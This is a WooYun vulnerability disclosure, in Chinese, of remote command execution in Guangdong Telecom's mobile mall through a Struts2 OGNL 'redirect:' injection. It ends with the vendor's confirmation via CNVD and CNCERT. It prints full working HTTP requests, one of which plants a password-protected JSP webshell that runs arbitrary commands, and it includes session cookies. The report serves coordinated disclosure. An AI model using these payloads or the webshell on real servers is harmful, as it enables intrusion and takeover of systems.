当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161987

漏洞标题:广东电信手机商城远程命令执行(绕waf来getshell)

相关厂商:广东电信

漏洞作者:

提交时间:2015-12-17 10:42

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

继上次广东电信政企客户系统可命令执行并getshell未被审核通过之后,发现手机商城也存在命令执行的问题,搞不好还有其他系统受害.....

详细说明:

访问广东电信官网:http://**.**.**.**/, 点击“天翼商城订单”,如图:

QQ20151217-0@2x.jpg


抓包,并修改为POST提交(获取服务器部署地址):

POST /telOrder/searchOrderFirst.action?ssid=gdsb-syleft-wdxx-wddd-ddcx HTTP/1.1
Host: m.**.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: citrix_ns_id=ZjOcbelh7QKTodZs5ZkWLJeSK40A000; **.**.**.**_%2F_wlf=aWRf?dixY9fgviG7lVnF8o1NjENW6bA0A&TlNDX3h1LTIyMi42OC4xODUuMjI5?NsNVGZ1ouCBNq/CMOEeCK+p6z4YA&; **.**.**.**_%2F_wat=SlNFU1NJT05JRF9f?YtTo0DgicCbpr01IGjV0BQD5kH8A&; i_vnum=5; i_sq=eship-gdt-prd-new%3D%2526pid%253D**.**.**.**%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fm.**.**.**.**%25252FtelOrder%25252FsearchOrderFirst.action%25253Fssid%25253Dgdsb-syleft-wdxx-wddd-ddcx%2526ot%253DA; EmallSessionId=A905C5ADD287242233A04617D1698148; looyu_id=991fe062f0225303b3aebd4ce82c94ba27_39415%3A1; Hm_lvt_e1acdde81d08199bf8f8b416afd00f2f=1450280455,1450281244; Hm_lpvt_e1acdde81d08199bf8f8b416afd00f2f=1450281244; LATN_CODE_COOKIE=020; svid=7746D5EDA455CD4E; i_sess=%20ssid%3Dgdsb-syleft-wdxx-wddd-ddcx%3B; ijg=1450281244082; ijg_s=More%20than%207%20days; i_invisit=1; i_PV=m.**.**.**.**%2FtelOrder%2FsearchOrderFirst.action; i_url=%5B%5BB%5D%5D; i_cc=true; TS2c9cf1=9fe84fa7fcf2dfab51d71750e2d02da02e9c3c8821d1799c5671891c; adslAccount=; i_ppv=63; ecss_identity=81578062288320528943; looyu_39415=v%3A279a44548f85c9900534d438b4f536266d%2Cref%3Ahttp%253A//**.**.**.**/%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 258
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"
-1
--------------------------5423a63046c50524a84963968721


执行效果:

QQ20151217-1@2x.jpg


接下来写入小的webshell(excuteMingl.jsp):

POST /telOrder/searchOrderFirst.action?ssid=gdsb-syleft-wdxx-wddd-ddcx HTTP/1.1
Host: m.**.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: citrix_ns_id=ZjOcbelh7QKTodZs5ZkWLJeSK40A000; **.**.**.**_%2F_wlf=aWRf?dixY9fgviG7lVnF8o1NjENW6bA0A&TlNDX3h1LTIyMi42OC4xODUuMjI5?NsNVGZ1ouCBNq/CMOEeCK+p6z4YA&; **.**.**.**_%2F_wat=SlNFU1NJT05JRF9f?YtTo0DgicCbpr01IGjV0BQD5kH8A&; i_vnum=5; i_sq=eship-gdt-prd-new%3D%2526pid%253D**.**.**.**%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fm.**.**.**.**%25252FtelOrder%25252FsearchOrderFirst.action%25253Fssid%25253Dgdsb-syleft-wdxx-wddd-ddcx%2526ot%253DA; EmallSessionId=A905C5ADD287242233A04617D1698148; looyu_id=991fe062f0225303b3aebd4ce82c94ba27_39415%3A1; Hm_lvt_e1acdde81d08199bf8f8b416afd00f2f=1450280455,1450281244; Hm_lpvt_e1acdde81d08199bf8f8b416afd00f2f=1450281244; LATN_CODE_COOKIE=020; svid=7746D5EDA455CD4E; i_sess=%20ssid%3Dgdsb-syleft-wdxx-wddd-ddcx%3B; ijg=1450281244082; ijg_s=More%20than%207%20days; i_invisit=1; i_PV=m.**.**.**.**%2FtelOrder%2FsearchOrderFirst.action; i_url=%5B%5BB%5D%5D; i_cc=true; TS2c9cf1=9fe84fa7fcf2dfab51d71750e2d02da02e9c3c8821d1799c5671891c; adslAccount=; i_ppv=63; ecss_identity=81578062288320528943; looyu_39415=v%3A279a44548f85c9900534d438b4f536266d%2Cref%3Ahttp%253A//**.**.**.**/%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 604
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/home/ecss/emallTelWeb8082/webapps/emallTelWeb/excuteMingl.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"
-1
--------------------------5423a63046c50524a84963968721


发现执行成功:

QQ20151217-2@2x.jpg


漏洞证明:

访问刚刚写入的webshell:

http://**.**.**.**/emallTelWeb/excuteMingl.jsp


QQ20151217-3@2x.jpg


QQ20151217-4@2x.jpg


QQ20151217-5@2x.jpg

修复方案:

struts2赶紧升级最新版本吧

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-12-21 18:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无